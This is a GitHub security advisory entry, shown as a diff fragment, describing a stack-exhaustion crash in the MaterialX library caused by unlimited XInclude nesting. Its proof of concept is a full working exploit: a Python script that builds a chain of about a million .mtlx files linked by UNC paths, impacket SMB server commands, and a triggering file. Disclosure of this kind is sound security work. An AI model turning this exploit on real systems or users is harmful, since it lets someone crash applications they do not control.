+ "details": "### Summary\nNested imports of MaterialX files can lead to a crash via stack memory exhaustion, due to the lack of a limit on the \"import chain\" depth.\n\n### Details\nThe MaterialX [specification](https://github.com/AcademySoftwareFoundation/MaterialX/blob/main/documents/Specification/MaterialX.Specification.md#mtlx-file-format-definition) supports importing other files by using `XInclude` tags.\n\nWhen parsing file imports, recursion is used to process nested files in the form of a tree with the root node being the first MaterialX files parsed.\n\nHowever, there is no limit imposed to the depth of files that\ncan be parsed by the library, therefore, by building a sufficiently deep chain of MaterialX files one referencing the next, it is possible to crash the process using the MaterialX library via stack exhaustion.\n\n### PoC\nThis test is going to employ Windows UNC paths, in order to make the Proof Of Concept more realistic. In fact, by using windows network shares, an attacker would be able to exploit the vulnerability (in Windows) if they could control the content of a single `.mtlx` file being parsed.\n\nNote that for the sake of simplicity the PoC will use the MaterialXView application to easily reproduce the vulnerability, however it does not affect MaterialXView directly.\n\nIn order to reproduce this test, please follow the steps below:\n\n1. Compile or download the MaterialXView application in a Windows machine\n2. In a separate Linux machine in the same local network, install the `impacket` package (the documentation of the package suggests using `pipx`, as in `python3 -m pipx install impacket\n`). \n3. In the Linux machine, create a file named `template.mtlx` with the following content:\n```xml\n<?xml version=\"1.0\"?>\n<materialx version=\"1.39\" colorspace=\"lin_rec709\">\n <xi:include href=\"\\\\\\\\{ip}\\\\{name}.mtlx\"/>\n <surfacematerial name=\"Aluminum_Brushed\" type=\"material\">\n <input name=\"surfaceshader\" type=\"surfaceshader\" nodename=\"open_pbr_surface_surfaceshader\" />\n </surfacematerial>\n <open_pbr_surface name=\"open_pbr_surface_surfaceshader\" type=\"surfaceshader\">\n <input name=\"base_color\" type=\"color3\" value=\"0.912, 0.914, 0.920\" />\n <input name=\"base_metalness\" type=\"float\" value=\"1.0\" />\n <input name=\"specular_color\" type=\"color3\" value=\"0.970, 0.979, 0.988\" />\n <input name=\"specular_roughness\" type=\"float\" value=\"0.2\" />\n <input name=\"specular_roughness_anisotropy\" type=\"float\" value=\"0.9\" />\n </open_pbr_surface>\n</materialx>\n```\n4. In the same directory, create a file named `script.py` with the following content:\n```python\nimport argparse\nimport uuid\nimport os\nfrom pathlib import Path\n\nMAX_FILES_PER_DIR = 1024\nMAX_DIRECTORIES = 1024\n\ndef uuid_generator(count):\n for _ in range(count):\n yield str(uuid.uuid4())\n\ndef get_dir_and_file_count(total_files):\n num_dirs = (total_files + MAX_FILES_PER_DIR - 1) // MAX_FILES_PER_DIR\n if num_dirs > MAX_DIRECTORIES:\n raise ValueError(f\"Too many files requested. Maximum is {MAX_FILES_PER_DIR * MAX_DIRECTORIES}\")\n return num_dirs\n\ndef create_materialx_chain(template_path, output_dir, ip_address, share_name, num_iterations):\n with open(template_path, 'r') as f:\n template_content = f.read()\n \n Path(output_dir).mkdir(parents=True, exist_ok=True)\n \n dir_count = get_dir_and_file_count(num_iterations)\n dir_uuids = [str(uuid.uuid4()) for _ in range(dir_count)]\n \n for dir_uuid in dir_uuids:\n Path(os.path.join(output_dir, dir_uuid)).mkdir(exist_ok=True)\n \n uuid_gen = uuid_generator(num_iterations)\n next_uuid = next(uuid_gen)\n first_file_path = None\n\n for i in range(num_iterations):\n current_uuid = next_uuid\n next_uuid = next(uuid_gen) if i < num_iterations - 1 else \"FINAL\"\n \n dir_index = i // MAX_FILES_PER_DIR\n dir_uuid = dir_uuids[dir_index]\n \n if next_uuid != \"FINAL\":\n next_dir_index = (i + 1) // MAX_FILES_PER_DIR\n next_dir_uuid = dir_uuids[next_dir_index]\n include_path = f\"{share_name}\\\\{next_dir_uuid}\\\\{next_uuid}\"\n else:\n include_path = next_uuid\n \n content = template_content.replace(\"{ip}\", ip_address)\n content = content.replace(\"{name}\", include_path)\n \n output_path = os.path.join(output_dir, dir_uuid, f\"{current_uuid}.mtlx\")\n with open(output_path, 'w') as f:\n f.write(content)\n\n if i == 0:\n first_file_path = f\"\\\\\\\\{ip_address}\\\\{share_name}\\\\{dir_uuid}\\\\{current_uuid}.mtlx\"\n print(f\"First file created at UNC path: {first_file_path}\")\n\ndef main():\n parser = argparse.ArgumentParser(description='Generate chain of MaterialX files')\n parser.add_argument('template', help='Path to template MaterialX file')\n parser.add_argument('output_dir', help='Output directory for generated files')\n parser.add_argument('ip_address', help='IP address to use in file paths')\n parser.add_argument('share_name', help='Share name to use in file paths')\n parser.add_argument('--iterations', type=int, default=10,\n help='Number of files to generate (default: 10)')\n \n args = parser.parse_args()\n \n if args.iterations > MAX_FILES_PER_DIR * MAX_DIRECTORIES:\n print(f\"Error: Maximum number of files is {MAX_FILES_PER_DIR * MAX_DIRECTORIES}\")\n return\n \n create_materialx_chain(\n args.template,\n args.output_dir,\n args.ip_address,\n args.share_name,\n args.iterations\n )\n\nif __name__ == \"__main__\":\n main()\n```\n5. Run the python script with the following command line, replacing the `$IP` placeholder with the IP address of your interface (the command will take some time to execute): `python3 script.py --iterations 1048576 template.mtlx chain $IP chain`\n - This will print, in the console, a line documenting the UNC path of the first file of the chain. Copy that path in the clipboard.\n6. Spawn the SMB server by executing the following command line: `pipx run --spec impacket smbserver.py -smb2support chain chain/`\n7. In the Windows machine, create a MaterialX file with the following content, replacing the `$UNCPATH` placeholder with the content of the path printed at step 5:\n```\n<?xml version=\"1.0\"?>\n<materialx version=\"1.39\" colorspace=\"lin_rec709\">\n <xi:include href=\"$UNCPATH\"/>\n <surfacematerial name=\"Aluminum_Brushed\" type=\"material\">\n <input name=\"surfaceshader\" type=\"surfaceshader\" nodename=\"open_pbr_surface_surfaceshader\" />\n </surfacematerial>\n <open_pbr_surface name=\"open_pbr_surface_surfaceshader\" type=\"surfaceshader\">\n <input name=\"base_color\" type=\"color3\" value=\"0.912, 0.914, 0.920\" />\n <input name=\"base_metalness\" type=\"float\" value=\"1.0\" />\n <input name=\"specular_color\" type=\"color3\" value=\"0.970, 0.979, 0.988\" />\n <input name=\"specular_roughness\" type=\"float\" value=\"0.2\" />\n <input name=\"specular_roughness_anisotropy\" type=\"float\" value=\"0.9\" />\n </open_pbr_surface>\n</materialx>\n```\n8. Load the MaterialX file in MaterialXView\n9. Notice that the viewer doesn't respond anymore. After some minutes, notice that the viewer crashes, demonstrating the Stack Exhaustion\n\nNote: by consulting the Windows `Event Viewer`, it is possible to examine the application crash, verifying that it is indeed crashing with a `STATUS_STACK_OVERFLOW (0xc00000fd)`.\n\n### Impact\n\nAn attacker exploiting this vulnerability would be able to intentionally stall and crash an application reading MaterialX files controlled by them.\n\nIn Windows, the attack complexity is lower, since the malicious MaterialX file can reference remote paths via the UNC notation. However, the attack would work in other systems as well, provided that the attacker can write an arbitrary amount of MaterialX files (implementing the chain) in the local file system.",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments